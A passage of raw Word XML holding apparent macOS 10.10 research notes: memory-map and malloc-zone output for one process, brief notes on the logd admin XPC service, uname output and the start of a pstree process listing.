        <w:t>__DATA                 00007fffda86d000-00007fffda86e000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkxld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda86e000-00007fffda86f000 [    4K] rw-/rwx SM=COW  /usr/lib/system/liblaunch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda86f000-00007fffda870000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libmacho.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda870000-00007fffda871000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libquarantine.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda871000-00007fffda872000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libremovefile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda872000-00007fffda874000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_asl.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda874000-00007fffda875000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_blocks.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda875000-00007fffda87e000 [   36K] rw-/rwx SM=COW  /usr/lib/system/libsystem_c.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda87e000-00007fffda87f000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_configuration.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda87f000-00007fffda880000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_coreservices.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda880000-00007fffda882000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_coretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda882000-00007fffda883000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_dnssd.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda883000-00007fffda886000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_info.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda886000-00007fffda889000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_kernel.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda889000-00007fffda88a000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_m.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda88a000-00007fffda88d000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_malloc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda88d000-00007fffda891000 [   16K] rw-/rwx SM=COW  /usr/lib/system/libsystem_network.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda891000-00007fffda893000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_networkextension.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda893000-00007fffda894000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_notify.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fffda894000-00007fffda895000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_platform.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda895000-00007fffda899000 [   16K] rw-/rwx SM=COW  /usr/lib/system/libsystem_pthread.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda899000-00007fffda89a000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_sandbox.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda89a000-00007fffda89b000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_secinit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda89b000-00007fffda89c000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_symptoms.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda89c000-00007fffda89f000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_trace.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda89f000-00007fffda8a0000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libunwind.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffda8a0000-00007fffda8a6000 [   24K] rw-/rwx SM=COW  /usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>==== Legend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">SM=sharing mode:  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">COW=copy_on_write PRV=private NUL=empty ALI=aliased </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:tab/>
        <w:t>SHM=shared ZER=zero_filled S/A=shared_alias</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>==== Summary for process 23599</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>ReadOnly portion of Libraries: Total=344.2M resident=0K(0%) swapped_out_or_unallocated=344.2M(100%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Writable regions: Total=1.0G written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=1.0G(100%)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                VIRTUAL   REGION </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">REGION TYPE                        SIZE    COUNT (non-coalesced) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">===========                     =======  ======= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Accelerate framework               640K        6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Activity Tracing                   256K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG backing stores                  912K        4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CG image                          1884K      109 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation                    128.1M      408 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image data                 5996K       43 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreUI image file                  180K        7 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Foundation                          24K        3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                             2776K       30 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Image IO                           132K       11 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Kernel Alloc Once                    8K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page                   48K       10 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata                    612K       18 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE                      8480K       13         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE (empty)              4760K        8         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE metadata                8K        3         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_LARGE_REUSABLE             2524K        4         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_NANO                      748.0M       47         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MALLOC_SMALL                      68.2M       24         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_SMALL (empty)              3848K        2         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY                       17.0M        7         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC_TINY (empty)               1024K        2         see MALLOC ZONE table below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Memory Tag 242                      12K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Memory Tag 251                      24K        3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">OpenCL                              16K        3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">STACK GUARD                       56.0M        9 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Stack                             11.6M        9 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">Swift metadata                     100K        9 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE                        192K       18 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__DATA                            34.6M      326 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__GLSLBUILTINS                    2588K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__IMAGE                            528K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__LINKEDIT                       114.3M       17 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__TEXT                           230.0M      327 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">__UNICODE                          556K        2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">mapped file                      191.0M       89 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory                     16.5M       21 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">===========                     =======  ======= </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">TOTAL                              1.6G     1565 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                          VIRTUAL ALLOCATION      BYTES          REGION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC ZONE                                  SIZE      COUNT  ALLOCATED  % FULL   COUNT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>===========                               =======  =========  =========  ======  ======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>DefaultMallocZone_0x10a050000              748.0M    2682970     185.6M     24%      46</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MallocHelperZone_0x10a020000                48.5M      22016      23.2M     47%      33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>QuartzCore_0x10dff9000                      37.0M      31591      1528K      4%       3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>GFXMallocZone_0x10a062000                   10.0M         46         7K      0%       2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>DefaultPurgeableMallocZone_0x10f9d0000        92K          1        88K     95%       2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>x-alloc_0x7fbdb085c800                        16K         23        608      3%       3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>x-alloc_0x7fbdb1060000                        12K         11        512      4%       1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>===========                               =======  =========  =========  ======  ======</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>TOTAL                                      843.6M    2736658     210.4M     24%      90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>sh-3.2#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="006153FA" w:rsidRPr="00236B14" w:rsidRDefault="006153FA" w:rsidP="00236B14"/>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="00250CE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="002151C5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log show</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F1222" w:rsidRDefault="005F1222" w:rsidP="002151C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>xpc_connect_create_mach_services(“com.apple.logd.admin”,0,2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="00250CE4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>com.apple.logd.admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="00250CE4">
      <w:r>
        <w:t>xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="002151C5"/>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">name </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Mac 10.10, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Last update 2015-02-12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:t>sh-3.2# uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="001340C8" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:t>Darwin userdeMac.local 14.0.0 Darwin Kernel Version 14.0.0: Fri Sep 19 00:26:44 PDT 2014; root:xnu-2782.1.97~2/RELEASE_X86_64 x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="178" w:name="_Toc411512327"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stree</w:t>
      </w:r>
      <w:bookmarkEnd w:id="178"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="00A14D1F" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:r>
        <w:object w:dxaOrig="2000" w:dyaOrig="1636">
          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:99.7pt;height:81.7pt" o:ole="">
            <v:imagedata r:id="rId122" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1026" DrawAspect="Icon" ObjectID="_1544944508" r:id="rId123"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc411512328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tree vew</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRDefault="004106D2" w:rsidP="0001799D">
      <w:hyperlink r:id="rId124" w:history="1">
        <w:r w:rsidR="0001799D" w:rsidRPr="00210914">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.westwind.com/reference/OS-X/background-processes.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D"/>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t>-+= 00001 root /sbin/</w:t>
      </w:r>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>launchd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (First user process)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00016 root /usr/sbin/syslogd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00017 root /usr/libexec/UserEventAgent (System)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00019 root /usr/libexec/kextd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve"> |--= 00020 root /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="003902E4" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003902E4">
        <w:rPr>
